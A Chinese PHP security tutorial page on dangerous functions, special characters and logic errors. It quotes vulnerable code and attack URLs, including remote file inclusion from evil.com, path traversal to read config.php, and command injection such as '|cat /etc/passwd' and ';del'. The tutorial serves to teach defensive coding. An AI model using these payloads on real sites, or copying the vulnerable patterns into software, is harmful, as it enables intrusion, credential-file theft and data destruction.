返回首页
当前位置: 主页 > 网络编程 > Php实例教程 >

重燃你的php安全之火

时间:2015-03-08 16:19来源:知行网www.zhixing123.cn 编辑:麦田守望者

对于脚本安全这个话题好像永远没完没了,如果你经常到国外的各种各样的bugtraq上,你会发现有一半以上都和脚本相关,诸如SQL injection,XSS,Path Disclosure,Remote commands execution这样的字眼比比皆是,我们看了之后的用途难道仅仅是抓肉鸡?对于我们想做web安全的人来说,最好就是拿来学习,可是万物抓根源,我们要的不是鱼而是渔。在国内,各种各样的php程序1.0版,2.0版像雨后春笋一样的冒出来,可是,大家关注的都是一些著名的cms,论坛,blog程序,很少的人在对那些不出名的程序做安全检测,对于越来越多的php程序员和站长来说,除了依靠服务器的堡垒设置外,php程序本身的安全多少你总得懂点吧。
有人说你们做php安全无非就是搞搞注入和跨站什么什么的,大错特错,如果这样的话,一个magic_quotes_gpc或者服务器里的一些安全设置就让我们全没活路了:(。我今天要说的不是注入,不是跨站,而是存在于php程序中的一些安全细节问题。OK!切入正题。

注意一些函数的过滤
有些函数在程序中是经常使用的,像include(),require(),fopen(),fwrite(),readfile(),unlink(),eval()以及它们的变体函数等等。这些函数都很实用,实用并不代表让你多省心,你还得为它们多费点心。 :)
1.include(),require()和fopen(),include_once(),require_once()这些都可以远程调用文件,对于它们的危害,google搜一下你就会很明了,对于所包含调用的变量没过滤好,就可以任意包含文件从而去执行。举个例子,看print.php


if (empty ($bn) ) { //检查是变量$bn是否为空
include (“$cfg_dir/site_${site}.php”); //把$cfg_dir这个路径里的site_${site}.php包含进来

不管存不存在$cfg_dir目录,$site这个变量你可以很自然的去使用,因为他根本没检查$site变量啊。可以把变量$site指定远程文件http://evil.com/cmd.gif去调用,也可以是本地的一个文件,你所指定的文件里写上php的语句,比如,(执行系统命令的语句),然后它就去包含执行这个含有php语句的文件了.就像这样

http://target.com/print.php?site=../../upload/20050118.gif?cmd=dir
http://target.com/print.php?site=http://evil.com/cmd.gif?cmd=dir //列出文件目录

甚至可以扩展到包含一些管理员文件,提升权限,典型的像以前phpwind,bo-blog的漏洞一样。除了依靠php.ini里的allow_url_fopen设为off禁止远程使用文件和open_base_dir禁止使用目录以外的文件外,你还得事先声明好只能包含哪些文件,这里就不多说废话了。
2.fopen(),file(),readfile(),openfile(),等也是该特别留意的地方。函数本身并没什么,它们的作用是去打开文件,可是如果对变量过滤不彻底的话,就会泄露源代码。这样的函数文本论坛里会有很多。


$articlearray=openfile(“$dbpath/$fid/$tid.php”); //打开$dbpath/$fid这个路径的$tid.php文件
$topic_detail=explode(“|”,$articlearray[0]); //用分割符|读出帖子的内容

很眼熟吧,这是ofstar以前版本的read.php,$fid和$tid没有任何过滤,$tid指定为某个文件提交,就发生了原代码泄露。就像这样。

http://explame.com/ofstar/read.php?fid=123&tid=../index

$tid会被加上php的后缀,所以直接写index。这仅仅是个例子,接着看吧。
3.fwrite()和它的变体函数这种漏洞想想都想得出,对于用户提交的字符没过滤的话,写入一段php后门又不是不可以。
4.unlink()函数,前段时间,phpwind里任意删除文件就是利用这个函数,对于判断是否删除的变量没过滤,变量可以指定为任意文件,当然就可以删除任意文件的变量。
5.eval(),preg_replace()函数,它们的作用是执行php代码,如果字符串没被经过任何过滤的话,会发生什么呢,我就常看见一些cms里面使用,想想,一句话的php木马不就是根据eval()原理制作的吗?
6.对于system()这些系统函数,你会说在php.ini里禁止系统函数,对,这也是好办法,可是象一些程序里需要,那是不是就不用了呢?就像上次我看到的一套很漂亮的php相册一样。另外对于popen(),proc_open(),proc_close()函数你也得特别注意,尽管他们执行命令后并没有直接的输出,但你想这到底对黑客们有没有用呢。再这里php提供提供了两个函数,escapeshellarg(),escapeshellcmd(),这两个函数用来对抗系统函数的调用攻击,也就是过滤。
对于危害,来举个例子,我们来看某论坛prod.php

$doubleApp = isset($argv[1]); //初始化变量$doubleApp 07行

if( $doubleApp ) //if语句 14行
{ //15行
$appDir = $argv[1]; //初始化$appDir 16行
system(“mkdir $prodDir/$appDir”); //使用系统函数system来创建目录$prodDir/$appDir 17行

本来是拿来创建$prodDir/$appDir目录的,再接着看上去,程序仅仅检测是否存在$argv[1],缺少对$argv[1]的必要过滤,那么你就可以这样

/prod.php?argv[1]=|ls%20-la或者/prod.php?argv[1]=|cat%20/etc/passwd

(分割符 | 在这里是UNIX的管道参数,可以执行多条命令。)
到这里,常见的漏洞类型应该知道点了吧。

对于特殊字符的重视
对于特殊字符,有句话叫All puts is invalid.外国人文章里这句话很常见的。所有输入都是有害的。你永远不要对用户所输入的东西省心,为了对付这些危害,程序员都在忙着过滤大把大把的字符,唯恐漏了什么。而有些程序员呢?好像从没注意过这些问题,从来都是敞开漏洞大门的。不说废话,还是先看看下面这些东西吧。
1.其实程序的漏洞里最关键,最让开发者放心不下的就是带着$符号的美元符号,变量,对于找漏洞的人来说,抓着变量两个字就是一切。就像目录遍历这个bug,很多邮件程序都存在,开发者考虑的很周全,有的甚至加上了网络硬盘这个东西,好是好,就像

http://mail.com/file.php?id=1&put=list&tid=1&file=./

要是我们把file这个变量换成./../甚至更上层呢?目录就这样被遍历了。
2.尖括号”<>”跨站你不会不知道吧,一些搜索栏里,文章,留言,像前段时间phpwind附件那里的跨站等等。当然,对于跨站问题,你要过滤的远远不止尖括号。不怕过滤时漏掉什么,而是怕你想不起要去过滤。
3.斜杆和反斜杆:对于/和\的过滤,记得魔力论坛的附件下载处的原代码泄露吗?

attachment.php?id=684&u=3096&extension=gif&attach=.\..\..\..\..\..\..\includes\config.php&filename=1.gif

对于过滤.. / \的问题,像windows主机不仅要过滤../还要过滤..\,windows主机对\会解析为/,这些细节跟SQL injection比起来,什么才叫深入呢?
4.对于反引号(“),反引号在php中很强大,它可以执行系统命令,就像system()这些系统函数一样,如果用户的恶意语句被它所执行的话就会危害服务器,我想除了服务器设置的很好以外,对于它们,你还是老老实实的过滤好吧。
5.对于换行符,NULL字符等等,像”\t,\x0B,\n,\r,这些,这些都是很有用的,像动网以前的上传漏洞就是因为上传中的NULL()字符引起的,对于这些能随意截断程序流程的字符,你说我们在检测的时候应该有多细心呢?
6.分号(;)和分割符(|)
分号截断程序流程,就像这个

shell_exec(“del ./yourpath/$file”); //使用系统函数shell_exec删除文件$file

变量$file没指定,那么直接写zizzy.php;del ./yourpath ,这样你的yourpath目录也就被del了。
分割符(|)是UNIX里自带的管道函数,可以连接几条命令来执行。有时候加在过滤不严的系统函数中执行。

逻辑错误
验证不完全和一些逻辑错误在程序里也很容易找到,特别是现在的程序员,只顾深入的学习,而对于逻辑错误等等这样的安全意识都没有培养的意识,其实这是是靠自己去培养,而不是等着人来报告bug给你。对于逻辑错误的判断,我们只能说,多练练吧,经验才是最重要的。
1.对于登陆验证的问题。举个例子:我们看某论坛的admin.php片断

if ((isset($_SESSION[‘username’])) && (isset($_SESSION[‘password’]))){
//是否存在username和password
$_u = $_SESSION[‘username’]; //提取username为$_u
$_p = $_SESSION[‘password’]; //提取password为$_p
………
$yes = mysql_query(“select * FROM users where username='”. $_u .”‘ AND password='”. $_p .”‘”); //执行mysql查询语句
..

------分隔线----------------------------
标签(Tag):php php教程 php实例教程 php5 php源代码 php基础教程 php技巧 php6
------分隔线----------------------------
推荐内容
猜你感兴趣